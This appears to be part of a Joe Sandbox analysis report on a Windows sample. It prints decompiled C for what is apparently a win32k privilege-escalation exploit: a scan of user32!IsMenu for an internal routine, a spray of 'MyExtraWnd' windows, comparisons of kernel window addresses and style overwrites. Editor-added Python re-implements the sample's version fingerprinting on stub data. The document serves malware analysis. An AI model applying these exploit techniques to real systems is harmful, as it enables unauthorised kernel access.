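                      Worked example, added by the editor and not part of the Joe Sandbox report or of the sample: a Python reconstruction of the version fingerprint in E0093BA30. It reads the OperatingSystemVersion stamp from a PE optional header at the offsets the sample uses (e_lfanew+0x40 and +0x42) and reproduces the sample's version-to-index mapping, using a constructed minimal PE stub as a stand-in for ntdll.dll. All function and constant names are the editor's. PE headers sit at the same offsets on disk and in memory, so the same code run over a real ntdll.dll from disk gives the answer the sample gets from the loaded module, which is why shimming GetVersionEx on an analysis VM does not steer this check.

```python
import struct

# Offsets used by the sample: IMAGE_DOS_HEADER.e_lfanew, and, relative to the "PE\0\0" signature,
# IMAGE_OPTIONAL_HEADER32.MajorOperatingSystemVersion (4-byte signature + 20-byte file header
# + 40 bytes into the optional header = 0x40); MinorOperatingSystemVersion is the next WORD.
E_LFANEW_OFFSET = 0x3C
OPT_OS_VERSION_OFFSET = 0x40

VER_NT_WORKSTATION = 1  # OSVERSIONINFOEXW.wProductType on client SKUs


def pe_os_version(image: bytes):
    """Return (major, minor) from the optional header, read exactly as the sample reads ntdll.dll."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    (e_lfanew,) = struct.unpack_from("<I", image, E_LFANEW_OFFSET)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    return struct.unpack_from("<HH", image, e_lfanew + OPT_OS_VERSION_OFFSET)


def index_for(major, minor, product_type=VER_NT_WORKSTATION):
    """The sample's version -> table-index mapping (the value it writes to 0x9440bc).
    None stands for the versions on which it gives up (its 'goto L1' cases)."""
    if major == 5:
        return (0 if product_type == VER_NT_WORKSTATION else 2) if minor >= 1 else None
    if major == 6:
        return {0: 4, 1: 6, 2: 8, 3: 0xA}.get(minor)
    if major == 10:
        return 0xC
    return None


def version_index(reported, product_type, ntdll_image):
    """reported = (major, minor) from GetVersionExW, which a shim may fake. XP/2003 is taken at
    face value; anything else is decided by ntdll's own header, as in E0093BA30, and only
    6.x and 10.x are accepted on that path."""
    major, minor = reported
    if major == 5 and minor >= 1:
        return index_for(5, minor, product_type)
    hdr_major, hdr_minor = pe_os_version(ntdll_image)
    if hdr_major not in (6, 10):
        return None
    return index_for(hdr_major, hdr_minor, product_type)


def build_pe_stub(major, minor, e_lfanew=0x80):
    """Constructed test data: a minimal, non-loadable PE32 image carrying the given
    OperatingSystemVersion stamp. It is not a real ntdll.dll."""
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, E_LFANEW_OFFSET, e_lfanew)
    nt = bytearray(4 + 20 + 224)              # signature + IMAGE_FILE_HEADER + IMAGE_OPTIONAL_HEADER32
    nt[:4] = b"PE\0\0"
    struct.pack_into("<H", nt, 4, 0x14C)      # Machine = IMAGE_FILE_MACHINE_I386
    struct.pack_into("<H", nt, 24, 0x10B)     # Magic = PE32
    struct.pack_into("<HH", nt, OPT_OS_VERSION_OFFSET, major, minor)
    return bytes(dos + nt)


if __name__ == "__main__":
    ntdll_w10 = build_pe_stub(10, 0)
    print(pe_os_version(ntdll_w10))                                      # (10, 0)
    print(hex(version_index((6, 1), VER_NT_WORKSTATION, ntdll_w10)))    # 0xc: a "Windows 7" shim is ignored
```

The last print is the practical point: a process that is told it runs on 6.1 by a compatibility shim still lands on the Windows 10 row of the sample's offset tables, because the decision is made from ntdll's header. An analyst who wants to watch the later stages on a different OS therefore has to run the sample on that OS (or patch the ntdll header in memory), not merely shim the version APIs.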

                      C-Code - Quality: 100%
			// Editor's reading: scan the first 0x30 bytes of user32!IsMenu for a `call rel32` that
			// immediately follows `mov dl, 2` (bytes B2 02) or, on older user32 builds, `push 2`
			// (bytes 6A 02), resolve the call target and cache it at 0x958054 (0x958050 = 1 marks the
			// push form). Locating the unexported callee of IsMenu this way is the standard trick
			// exploit code uses to reach user32's internal handle-validation routine; the report
			// itself does not name the callee.
			E0093C790() {
                      				intOrPtr _t13;
                      				intOrPtr _t15;
                      				void* _t19;
                      				_Unknown_base(*)()* _t23;
                      
                      				_t23 = GetProcAddress(LoadLibraryA("USER32.dll"), "IsMenu");
                      				_t19 = 0;
                      				do {
					if( *((intOrPtr*)(_t19 + _t23)) != 0x2b2) { // two-byte compare against B2 02 = mov dl, 2 (the pointer type is a decompiler artifact)
                      						goto L3;
                      					} else {
                      						_t19 = _t19 + 2;
						if( *((char*)(_t19 + _t23)) == 0xe8) { // E8 = call rel32; compared as an unsigned byte, the char cast is a decompiler artifact
							_t13 =  *((intOrPtr*)(_t19 + _t23 + 1)) + 5 + _t19 + _t23; // target = address of the call + 5 + rel32
                      							 *0x958054 = _t13;
                      						} else {
                      							goto L3;
                      						}
                      					}
                      					L5:
                      					if(_t13 != 0) {
                      						return _t13;
                      					} else {
                      						 *0x958050 = 1;
                      						do {
							if( *((intOrPtr*)(_t13 + _t23)) == 0x26a) { // 6A 02 = push 2 (older IsMenu layout)
                      								_t13 = _t13 + 2;
                      								if( *((char*)(_t13 + _t23)) == 0xe8) {
                      									_t9 = _t23 + 5; // 0x5
                      									_t15 = _t9 +  *((intOrPtr*)(_t13 + _t23 + 1)) + _t13;
                      									 *0x958054 = _t15;
                      									return _t15;
                      								}
                      							}
                      							_t13 = _t13 + 1;
						} while (_t13 < 0x30); // same 0x30-byte scan window as the first loop
                      						return _t13;
                      					}
                      					L3:
                      					_t19 = _t19 + 1;
				} while (_t19 < 0x30); // only the first 0x30 bytes of IsMenu are examined
                      				_t13 =  *0x958054;
                      				goto L5;
			}

                      APIs
                      • LoadLibraryA.KERNEL32(USER32.dll,IsMenu,0093C761,?,0093BF8C,00000000,74656490,?,00000000), ref: 0093C79A
                      • GetProcAddress.KERNEL32(00000000), ref: 0093C7A1
                      Strings
                      Yara matches
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: IsMenu$USER32.dll
                      • API String ID: 2574300362-1495665521
                      • Opcode ID: 878b02cd1bb6dbf10737c2cbbb5ba258393a7f1b1344aff79dfd5f22737bb4cc
                      • Instruction ID: 7b96f8f9e283ee73b81bac1ede5b8da5d0136b06cce0e4f696229077dbae5a02
                      • Opcode Fuzzy Hash: 878b02cd1bb6dbf10737c2cbbb5ba258393a7f1b1344aff79dfd5f22737bb4cc
                      • Instruction Fuzzy Hash: E0012BF2A1C6014BC7288F74CC55B6173E5EF41348B08457DD407E72E2EB3484869F04
                      Uniqueness

                      Uniqueness Score: -1.00%
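                      Worked example, added by the editor and not part of the Joe Sandbox report or of the sample: a Python re-implementation of the byte scan in E0093C790, run over a constructed stand-in for the prologue of user32!IsMenu. The bytes and the load addresses are the editor's test data, not real user32 code, and the function names are the editor's. The point it makes concrete is the x86 rule the sample relies on to turn a `call rel32` into an absolute address: target = address of the call instruction + 5 + the signed 32-bit displacement.

```python
import struct

SCAN_WINDOW = 0x30  # the sample only examines the first 0x30 bytes of IsMenu

# Two-byte instruction that precedes the call in the two IsMenu layouts the sample knows about.
PATTERNS = (
    (b"\xb2\x02", "mov dl, 2"),   # first loop in E0093C790: word 0x02b2
    (b"\x6a\x02", "push 2"),      # second loop: word 0x026a, flagged via 0x958050 = 1
)
CALL_REL32 = 0xE8


def find_callee(is_menu: bytes, is_menu_va: int):
    """Scan IsMenu's first bytes for `<pattern>; call rel32` and resolve the call target.
    Returns (target_va, pattern_name) or (None, None). Mirrors E0093C790: the first pattern
    is tried over the whole window before the second one is considered."""
    for prefix, name in PATTERNS:
        for i in range(SCAN_WINDOW):
            call_at = i + len(prefix)
            if is_menu[i:call_at] != prefix or call_at + 5 > len(is_menu):
                continue
            if is_menu[call_at] != CALL_REL32:
                continue
            (rel32,) = struct.unpack_from("<i", is_menu, call_at + 1)
            # x86 call rel32: the displacement is relative to the instruction that follows the call
            return is_menu_va + call_at + 5 + rel32, name
    return None, None


# Constructed stand-in for the prologue of user32!IsMenu; these are not real user32 bytes,
# and the two addresses are hypothetical load addresses chosen for the demo.
IS_MENU_VA = 0x75E4A120
CALLEE_VA = 0x75E3C000


def build_is_menu(form="mov dl, 2", va=IS_MENU_VA, callee=CALLEE_VA):
    """Assemble: mov edi,edi / push ebp / mov ebp,esp / <form> / call callee / test eax,eax / pop ebp / ret."""
    body = bytearray(b"\x8b\xff\x55\x8b\xec")
    body += b"\xb2\x02" if form == "mov dl, 2" else b"\x6a\x02"
    rel32 = callee - (va + len(body) + 5)      # displacement is relative to the next instruction
    body += b"\xe8" + struct.pack("<i", rel32)
    body += b"\x85\xc0\x5d\xc3"
    return bytes(body.ljust(SCAN_WINDOW + 8, b"\xcc"))   # pad with int3 so the scan window is fully backed


if __name__ == "__main__":
    target, how = find_callee(build_is_menu(), IS_MENU_VA)
    print(hex(target), how)   # 0x75e3c000 mov dl, 2
```

Two caveats carry over from the sample's own logic. The scan accepts the first hit, so a `6A 02` or `B2 02` that happens to occur inside the immediate of an unrelated instruction in the window would be taken as the pattern; and a user32 build whose IsMenu prologue does not match either layout within 0x30 bytes leaves the cached value untouched, which is exactly the `_t13 == 0` path the decompilation shows.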

                      C-Code - Quality: 100%
			// Restores the default unhandled-exception filter and hands _a4 (an EXCEPTION_POINTERS) to
			// UnhandledExceptionFilter: the shape of the MSVC CRT's security-failure reporting helper,
			// not sample-specific logic.
			E009333B8(struct _EXCEPTION_POINTERS* _a4) {
                      
                      				SetUnhandledExceptionFilter(0);
                      				return UnhandledExceptionFilter(_a4);
			}

                      APIs
                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,0093422E,?,?,?,00000000), ref: 009333BD
                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 009333C6
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
                      • Opcode ID: 841cb4a85cc25efddd8770beb54d5710f1898451aaf06aae9f54201279f0f772
                      • Instruction ID: 0fbfeba90e6cfc36847d3dc6d869771b139c7288f691d78b84bca329379417c6
                      • Opcode Fuzzy Hash: 841cb4a85cc25efddd8770beb54d5710f1898451aaf06aae9f54201279f0f772
                      • Instruction Fuzzy Hash: C1B0923505C208EBCB442B91EC09B587F69FB04752F004014F60D490E18BB29410AEA2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
			// CRT start-up wrapper around SetUnhandledExceptionFilter; _a4 is the filter to install.
			E00933387(_Unknown_base(*)()* _a4) {
                      
                      				return SetUnhandledExceptionFilter(_a4);
			}

                      APIs
                      • SetUnhandledExceptionFilter.KERNEL32(?,?,009318DE,00931893), ref: 0093338D
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
                      • Opcode ID: 78256e181c80ee397ac3ab7be1299af334cada15e57d3c2717b0cedf00fd9f00
                      • Instruction ID: 9ded21fb02d2889484d6226c3249492a25cf18cbd1d0646d446b46ba5fa4eb75
                      • Opcode Fuzzy Hash: 78256e181c80ee397ac3ab7be1299af334cada15e57d3c2717b0cedf00fd9f00
                      • Instruction Fuzzy Hash: 09A0113000820CAB8B002B82EC08A883F2CEA002A0B000020F80C0A0208BA2A820AA80
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
			// CRT heap initialisation: cache the process heap handle at 0x95729c and return non-zero on
			// success. GetProcessHeap is a common building block of heap-flag debugger checks, but this
			// routine only stores the handle.
			E00932041() {
                      				void* _t3;
                      
                      				_t3 = GetProcessHeap();
                      				 *0x95729c = _t3;
                      				return 0 | _t3 != 0x00000000;
			}

                      APIs
                      • GetProcessHeap.KERNEL32(009314F8,00941E70,00000014), ref: 00932041
                      Yara matches
                      Similarity
                      • API ID: HeapProcess
                      • String ID:
                      • API String ID: 54951025-0
                      • Opcode ID: 508a4531c74dc42ba03d18532285f704d89072ec627b2cb5146c985819a16137
                      • Instruction ID: 0d4d9988b07a61e9ca2c9d68fb15cf1c32c86fd6551521a5df41e195fa8a9745
                      • Opcode Fuzzy Hash: 508a4531c74dc42ba03d18532285f704d89072ec627b2cb5146c985819a16137
                      • Instruction Fuzzy Hash: 2EB012F032F20247570C0B3A7C5505936D45708212344403D700FC11A0DF20C8D4FF00
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 151 93d110-93d182 CreateWindowExW 152 93d188-93d198 call 93c750 151->152 153 93d71c 151->153 159 93d715-93d716 DestroyWindow 152->159 160 93d19e-93d1a5 152->160 154 93d71e-93d739 call 93161c 153->154 159->153 161 93d266-93d26b 160->161 162 93d1ab-93d1c3 GetWindowLongW SetWindowLongW 160->162 163 93d271-93d27a DestroyWindow 161->163 164 93d1c5-93d1ce 162->164 163->153 167 93d280-93d287 163->167 165 93d1d4-93d1fc call 9310c5 164->165 166 93d25e-93d264 164->166 173 93d1fe-93d21a 165->173 174 93d22c-93d234 165->174 166->163 167->153 168 93d28d-93d294 167->168 168->153 170 93d29a-93d31b RegisterClassExW 168->170 170->153 172 93d321-93d339 call 935a90 170->172 179 93d340-93d373 CreateWindowExW 172->179 176 93d223-93d22a 173->176 177 93d21c 173->177 174->164 176->163 177->176 180 93d375-93d37c 179->180 181 93d37e-93d386 179->181 180->179 180->181 182 93d390-93d39f 181->182 183 93d3a0-93d3de call 93c750 * 2 182->183 188 93d3e0 183->188 189 93d40a-93d40d 183->189 192 93d3e2-93d3e4 188->192 193 93d3e6-93d402 188->193 190 93d413-93d419 189->190 191 93d4b0-93d4b7 189->191 190->183 196 93d4c2-93d4d1 191->196 197 93d4b9-93d4c0 191->197 192->189 192->193 194 93d404 193->194 195 93d41b-93d4aa call 93c750 * 2 193->195 194->189 198 93d406-93d408 194->198 195->191 196->182 199 93d4d7-93d4d9 196->199 197->196 197->199 198->189 198->195 202 93d4e0-93d4f3 199->202 204 93d500-93d507 202->204 205 93d4f5-93d4fb 202->205 204->202 208 93d509-93d510 204->208 205->204 207 93d4fd-93d4fe DestroyWindow 205->207 207->204 208->153 209 93d516-93d51d 208->209 209->153 210 93d523-93d52a 209->210 211 93d530-93d536 210->211 212 93d70e-93d713 210->212 213 93d540-93d54b 211->213 212->154 213->212 214 93d551-93d576 213->214 215 93d6fb-93d708 214->215 216 93d57c-93d58e CreateThread 214->216 215->212 215->213 217 93d593-93d59a 216->217 218 93d5a6-93d5a9 217->218 219 93d59c-93d5a4 Sleep 217->219 220 93d5af-93d5f0 CreateWindowExW 218->220 221 93d6dd-93d6f5 DestroyWindow * 2 TerminateThread 218->221 219->217 219->218 222 93d5f6-93d682 GetWindowLongW SetWindowLongW call 9310c5 keybd_event * 4 Sleep 220->222 223 93d688-93d6bb DestroyWindow * 2 TerminateThread WaitForSingleObject 220->223 221->215 222->223 223->215 225 93d6bd-93d6cf 223->225 225->215 227 93d6d1-93d6db call 93c820 225->227 227->215
                      C-Code - Quality: 74%
                      			E0093D110(intOrPtr __edx) {
                      				int _v8;
                      				signed int _v12;
                      				char _v20;
                      				intOrPtr _v28;
                      				signed int _v32;
                      				short _v34;
                      				short _v2032;
                      				char _v3056;
                      				intOrPtr _v3060;
                      				struct HWND__* _v3064;
                      				intOrPtr _v3068;
                      				int _v3072;
                      				intOrPtr _v3076;
                      				intOrPtr _v3080;
                      				intOrPtr _v3084;
                      				struct _WNDCLASSEXW _v3132;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				signed int _t73;
                      				signed int _t74;
                      				struct HWND__* _t94;
                      				signed int _t95;
                      				void* _t97;
                      				void* _t99;
                      				intOrPtr _t100;
                      				struct HWND__* _t102;
                      				intOrPtr _t104;
                      				intOrPtr _t113;
                      				intOrPtr _t115;
                      				intOrPtr _t159;
                      				intOrPtr _t162;
                      				intOrPtr _t163;
                      				void* _t165;
                      				intOrPtr _t166;
                      				intOrPtr _t167;
                      				void* _t169;
                      				intOrPtr _t176;
                      				intOrPtr _t179;
                      				intOrPtr _t181;
                      				struct HWND__* _t184;
                      				void* _t185;
                      				signed int _t188;
                      				void* _t193;
                      				int _t194;
                      				signed int _t195;
                      				signed int _t196;
                      				struct _SECURITY_ATTRIBUTES* _t197;
                      				struct _SECURITY_ATTRIBUTES* _t201;
                      				signed int _t202;
                      				void* _t203;
                      				void* _t223;
                      				void* _t225;
                      
                      				_t181 = __edx;
                      				_push(0xfffffffe);
                      				_push(0x942148);
                      				_push(E00932A50);
                      				_push( *[fs:0x0]);
                      				_t73 =  *0x943050; // 0xce43520a
                      				_v12 = _v12 ^ _t73;
                      				_t74 = _t73 ^ _t202;
                      				_v32 = _t74;
                      				_push(_t74);
                      				 *[fs:0x0] =  &_v20;
                      				_v28 = _t203 - 0xc28;
                      				_v3072 = 0;
                      				_t184 = CreateWindowExW(0, L"#32768", 0, 0, 0, 0, 0, 0, 0, 0,  *0x9580b8, 0);
                      				_v3064 = _t184;
                      				if(_t184 == 0) {
                      					L57:
                      					L58:
                      					 *[fs:0x0] = _v20;
                      					_pop(_t185);
                      					_pop(_t193);
                      					_pop(_t165);
                      					return E0093161C(_t165, _v32 ^ _t202, _t181, _t185, _t193);
                      				}
                      				_t166 = E0093C750(_t184);
                      				_v3068 = _t166;
                      				if(_t166 == 0) {
                      					DestroyWindow(_t184);
                      					goto L57;
                      				}
                      				if( *0x9441b0 != 6) {
                      					_t194 = 1;
                      					_v3072 = 1;
                      				} else {
                      					SetWindowLongW(_t184, 0xfffffff0, GetWindowLongW(_t184, 0xfffffff0) | 0x40000000);
                      					_t201 = 0;
                      					while(1) {
                      						_v3060 = _t201;
                      						if(_t201 >= 0xa) {
                      							break;
                      						}
                      						_v8 = 0;
                      						_push(0xdddddddd);
                      						_push(0xcccccccc);
                      						_push(0xfffffff4);
                      						_push(_t184);
                      						_t159 =  *0x9441ec; // 0x1471
                      						_push(_t159 - _t201);
                      						L009310C5();
                      						if( *((intOrPtr*)(_t166 + 0xc0)) == 0) {
                      							_v8 = 0xfffffffe;
                      							_t201 =  &(_t201->nLength);
                      							continue;
                      						}
                      						_t162 =  *0x9441ec; // 0x1471
                      						_t163 = _t162 - _t201;
                      						 *0x9441ec = _t163;
                      						_t194 = 1;
                      						_v3072 = 1;
                      						if(_t163 == 0x1471) {
                      							 *0x958070 =  *0x958070 - 8;
                      						}
                      						_v8 = 0xfffffffe;
                      						L12:
                      						DestroyWindow(_t184);
                      						if(_t194 == 0 ||  *0x958060 == 0 ||  *0x958064 == 0) {
                      							goto L57;
                      						} else {
                      							memset( &_v2032, 0x610061, 0x64 << 2);
                      							_v34 = 0;
                      							_v3132.cbSize = 0x30;
                      							_v3132.style = 0;
                      							_v3132.lpfnWndProc = DefWindowProcW;
                      							_v3132.cbClsExtra = 0;
                      							_v3132.cbWndExtra = 0;
                      							_v3132.hInstance =  *0x9580b8;
                      							asm("xorps xmm0, xmm0");
                      							asm("movdqu [ebp-0xc20], xmm0");
                      							_v3132.lpszClassName = L"MyExtraWnd";
                      							_v3132.hIconSm = 0;
                      							if(RegisterClassExW( &_v3132) == 0) {
                      								goto L57;
                      							}
                      							E00935A90( &_v3056, 0, 0x400);
                      							_t188 = 0;
                      							while(1) {
                      								_t94 = CreateWindowExW(0, L"MyExtraWnd",  &_v2032, 0, 0, 0, 0, 0, 0, 0,  *0x9580b8, 0);
                      								 *(_t202 + _t188 * 4 - 0xbec) = _t94;
                      								if(_t94 == 0) {
                      									break;
                      								}
                      								_t188 = _t188 + 1;
                      								if(_t188 < 0x100) {
                      									continue;
                      								}
                      								break;
                      							}
                      							_t95 = 0;
                      							_v3064 = 0;
                      							do {
                      								_t195 = 0;
                      								_t96 =  *((intOrPtr*)(_t202 + _t95 * 4 - 0xbec));
                      								_v3060 =  *((intOrPtr*)(_t202 + _t95 * 4 - 0xbec));
                      								while(1) {
                      									_t97 = E0093C750(_t96);
                      									_t167 =  *((intOrPtr*)(_t97 + 0x20));
                      									_v3084 = _t167;
                      									_v3076 =  *((intOrPtr*)(_t97 + 0x24));
                      									_t99 = E0093C750( *((intOrPtr*)(_t202 + _t195 * 4 - 0xbec)));
                      									_t176 =  *((intOrPtr*)(_t99 + 0x20));
                      									_v3080 = _t176;
                      									_t181 =  *((intOrPtr*)(_t99 + 0x24));
                      									_v3068 = _t181;
                      									_t100 = _v3076;
                      									_t223 = _t100 - _t181;
                      									if(_t223 > 0 || _t223 >= 0 && _t167 >= _t176) {
                      										goto L27;
                      									}
                      									L24:
                      									_t181 = _t176 + 0x300;
                      									asm("adc ecx, 0x0");
                      									_t169 = _t167 + 0x40000;
                      									asm("adc eax, 0x0");
                      									_t225 = _t100 - _v3068;
                      									if(_t225 > 0 || _t225 >= 0 && _t169 > _t181) {
                      										 *0x958080 = _v3060;
                      										 *0x958090 =  *((intOrPtr*)(_t202 + _t195 * 4 - 0xbec));
                      										 *0x958084 = E0093C750(_v3060);
                      										 *0x958094 = E0093C750( *((intOrPtr*)(_t202 + _t195 * 4 - 0xbec)));
                      										 *0x958088 = _v3084;
                      										 *0x95808c = _v3076;
                      										 *0x958098 = _v3080;
                      										 *0x95809c = _v3068;
                      										_t179 =  *0x958084;
                      										 *0x9580a8 =  *((intOrPtr*)(_t179 + 0x10));
                      										 *0x9580ac =  *((intOrPtr*)(_t179 + 0x14));
                      										asm("adc ecx, 0x0");
                      										asm("adc ecx, 0xffffffff");
                      										 *0x9580a0 =  *0x958088 +  *0x958060 + 0xfffffff8;
                      										 *0x9580a4 =  *0x95808c;
                      										L30:
                      										if( *0x958080 == 0 ||  *0x958090 == 0) {
                      											break;
                      										} else {
                      											goto L33;
                      										}
                      									}
                      									L27:
                      									_t195 = _t195 + 1;
                      									if(_t195 > _t188) {
                      										goto L30;
                      									}
                      									_t96 = _v3060;
                      									_t97 = E0093C750(_t96);
                      									_t167 =  *((intOrPtr*)(_t97 + 0x20));
                      									_v3084 = _t167;
                      									_v3076 =  *((intOrPtr*)(_t97 + 0x24));
                      									_t99 = E0093C750( *((intOrPtr*)(_t202 + _t195 * 4 - 0xbec)));
                      									_t176 =  *((intOrPtr*)(_t99 + 0x20));
                      									_v3080 = _t176;
                      									_t181 =  *((intOrPtr*)(_t99 + 0x24));
                      									_v3068 = _t181;
                      									_t100 = _v3076;
                      									_t223 = _t100 - _t181;
                      									if(_t223 > 0 || _t223 >= 0 && _t167 >= _t176) {
                      										goto L27;
                      									}
                      								}
                      								_t95 =  &(_v3064->i);
                      								_v3064 = _t95;
                      							} while (_t95 <= _t188);
                      							L33:
                      							_t196 = 0;
                      							do {
                      								_t102 =  *(_t202 + _t196 * 4 - 0xbec);
                      								if(_t102 !=  *0x958080 && _t102 !=  *0x958090) {
                      									DestroyWindow(_t102);
                      								}
                      								_t196 = _t196 + 1;
                      							} while (_t196 < 0x100);
                      							if( *0x958080 == 0 ||  *0x958090 == 0) {
                      								goto L57;
                      							} else {
                      								if( *0x95807c != 0) {
                      									L55:
                      									goto L58;
                      								}
                      								while(1) {
                      									_t104 =  *0x944244; // 0xa
                      									if( *0x9580bc >= _t104) {
                      										goto L55;
                      									}
                      									 *0x9580d4 = 0;
                      									 *0x9580d8 = 0;
                      									 *0x9580d0 = 0;
                      									if( *0x95807c != 0) {
                      										L54:
                      										 *0x9580bc =  *0x9580bc + 1;
                      										if( *0x95807c == 0) {
                      											continue;
                      										}
                      										goto L55;
                      									}
                      									_t197 = 0;
                      									 *0x9580c0 = CreateThread(0, 0, E0093C970, 0, 0, 0);
                      									while( *0x9580d0 == 0) {
                      										_t197 =  &(_t197->nLength);
                      										Sleep(0x32);
                      										if(_t197 < 0x14) {
                      											continue;
                      										}
                      										break;
                      									}
                      									if(_t197 >= 0x14) {
                      										DestroyWindow( *0x9580d4);
                      										DestroyWindow( *0x9580d8);
                      										TerminateThread( *0x9580c0, 0xffffffff);
                      									} else {
                      										_t113 =  *0x94424c; // 0x1388
                      										_t115 =  *0x944248; // 0x1388
                      										 *0x9580d8 = CreateWindowExW(0x80000, L"MyMainWnd", 0, 0x10000000, _t115 + 1, _t113 + 1, 1, 1, 0, 0,  *0x9580b8, 0);
                      										if( *0x9580d8 != 0) {
                      											asm("adc edi, 0x0");
                      											asm("adc edi, 0x0");
                      											asm("adc edi, 0xffffffff");
                      											SetWindowLongW( *0x9580d8, 0xfffffff0, GetWindowLongW( *0x9580d8, 0xfffffff0) | 0x40000000);
                      											_push( *0x95808c);
                      											_push( *0x958088 +  *0x958064 + 3 - 0x28);
                      											_push(0xfffffff4);
                      											_push( *0x9580d8);
                      											_push( *0x9441ec);
                      											L009310C5();
                      											keybd_event(0x12, 0, 0, 0);
                      											keybd_event(0x1b, 0, 0, 0);
                      											keybd_event(0x1b, 0, 2, 0);
                      											keybd_event(0x12, 0, 2, 0);
                      											Sleep(0x64);
                      										}
                      										DestroyWindow( *0x9580d4);
                      										DestroyWindow( *0x9580d8);
                      										TerminateThread( *0x9580c0, 0xffffffff);
                      										WaitForSingleObject( *0x9580c0, 0xffffffff);
                      										if( *0x95807c == 0 &&  *((intOrPtr*)( *0x958084 +  *0x958064)) >= 0x4000000) {
                      											 *0x95807c = E0093C820();
                      										}
                      									}
                      									goto L54;
                      								}
                      								goto L55;
                      							}
                      						}
                      					}
                      					_t194 = _v3072;
                      				}
                      			}

                      0x0093d110
                      0x0093d113
                      0x0093d115
                      0x0093d11a
                      0x0093d125
                      0x0093d12c
                      0x0093d131
                      0x0093d134
                      0x0093d136
                      0x0093d13c
                      0x0093d140
                      0x0093d146
                      0x0093d149
                      0x0093d178
                      0x0093d17a
                      0x0093d182
                      0x0093d71c
                      0x0093d71e
                      0x0093d721
                      0x0093d729
                      0x0093d72a
                      0x0093d72b
                      0x0093d739
                      0x0093d739
                      0x0093d18e
                      0x0093d190
                      0x0093d198
                      0x0093d716
                      0x00000000
                      0x0093d716
                      0x0093d1a5
                      0x0093d266
                      0x0093d26b
                      0x0093d1ab
                      0x0093d1bd
                      0x0093d1c3
                      0x0093d1c5
                      0x0093d1c5
                      0x0093d1ce
                      0x00000000
                      0x00000000
                      0x0093d1d4
                      0x0093d1db
                      0x0093d1e0
                      0x0093d1e5
                      0x0093d1e7
                      0x0093d1e8
                      0x0093d1ef
                      0x0093d1f0
                      0x0093d1fc
                      0x0093d22c
                      0x0093d233
                      0x00000000
                      0x0093d233
                      0x0093d1fe
                      0x0093d203
                      0x0093d205
                      0x0093d20a
                      0x0093d20f
                      0x0093d21a
                      0x0093d21c
                      0x0093d21c
                      0x0093d223
                      0x0093d271
                      0x0093d272
                      0x0093d27a
                      0x00000000
                      0x0093d29a
                      0x0093d2aa
                      0x0093d2ae
                      0x0093d2b2
                      0x0093d2bc
                      0x0093d2c7
                      0x0093d2cd
                      0x0093d2d7
                      0x0093d2e6
                      0x0093d2ec
                      0x0093d2ef
                      0x0093d2f7
                      0x0093d301
                      0x0093d31b
                      0x00000000
                      0x00000000
                      0x0093d32f
                      0x0093d337
                      0x0093d340
                      0x0093d364
                      0x0093d36a
                      0x0093d373
                      0x00000000
                      0x00000000
                      0x0093d375
                      0x0093d37c
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0093d37c
                      0x0093d37e
                      0x0093d380
                      0x0093d390
                      0x0093d390
                      0x0093d392
                      0x0093d399
                      0x0093d3a0
                      0x0093d3a1
                      0x0093d3a6
                      0x0093d3a9
                      0x0093d3b2
                      0x0093d3bf
                      0x0093d3c4
                      0x0093d3c7
                      0x0093d3cd
                      0x0093d3d0
                      0x0093d3d6
                      0x0093d3dc
                      0x0093d3de
                      0x00000000
                      0x00000000
                      0x0093d3e6
                      0x0093d3e8
                      0x0093d3f4
                      0x0093d3f7
                      0x0093d3fd
                      0x0093d400
                      0x0093d402
                      0x0093d421
                      0x0093d42d
                      0x0093d439
                      0x0093d444
                      0x0093d44f
                      0x0093d45a
                      0x0093d465
                      0x0093d470
                      0x0093d475
                      0x0093d47e
                      0x0093d486
                      0x0093d49c
                      0x0093d4a2
                      0x0093d4a5
                      0x0093d4aa
                      0x0093d4b0
                      0x0093d4b7
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0093d4b7
                      0x0093d40a
                      0x0093d40a
                      0x0093d40d
                      0x00000000
                      0x00000000
                      0x0093d413
                      0x0093d3a1
                      0x0093d3a6
                      0x0093d3a9
                      0x0093d3b2
                      0x0093d3bf
                      0x0093d3c4
                      0x0093d3c7
                      0x0093d3cd
                      0x0093d3d0
                      0x0093d3d6
                      0x0093d3dc
                      0x0093d3de
                      0x00000000
                      0x00000000
                      0x0093d3de
                      0x0093d4c8
                      0x0093d4c9
                      0x0093d4cf
                      0x0093d4d7
                      0x0093d4d7
                      0x0093d4e0
                      0x0093d4e0
                      0x0093d4f3
                      0x0093d4fe
                      0x0093d4fe
                      0x0093d500
                      0x0093d501
                      0x0093d510
                      0x00000000
                      0x0093d523
                      0x0093d52a
                      0x0093d70e
                      0x00000000
                      0x0093d70e
                      0x0093d540
                      0x0093d540
                      0x0093d54b
                      0x00000000
                      0x00000000
                      0x0093d551
                      0x0093d55b
                      0x0093d565
                      0x0093d576
                      0x0093d6fb
                      0x0093d6fb
                      0x0093d708
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0093d708
                      0x0093d57c
                      0x0093d58e
                      0x0093d593
                      0x0093d59c
                      0x0093d59f
                      0x0093d5a4
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0093d5a4
                      0x0093d5a9
                      0x0093d6e3
                      0x0093d6eb
                      0x0093d6f5
                      0x0093d5af
                      0x0093d5bf
                      0x0093d5c6
                      0x0093d5e4
                      0x0093d5f0
                      0x0093d607
                      0x0093d60d
                      0x0093d616
                      0x0093d635
                      0x0093d63b
                      0x0093d63c
                      0x0093d63d
                      0x0093d644
                      0x0093d645
                      0x0093d64b
                      0x0093d65e
                      0x0093d668
                      0x0093d672
                      0x0093d67c
                      0x0093d680
                      0x0093d682
                      0x0093d68e
                      0x0093d696
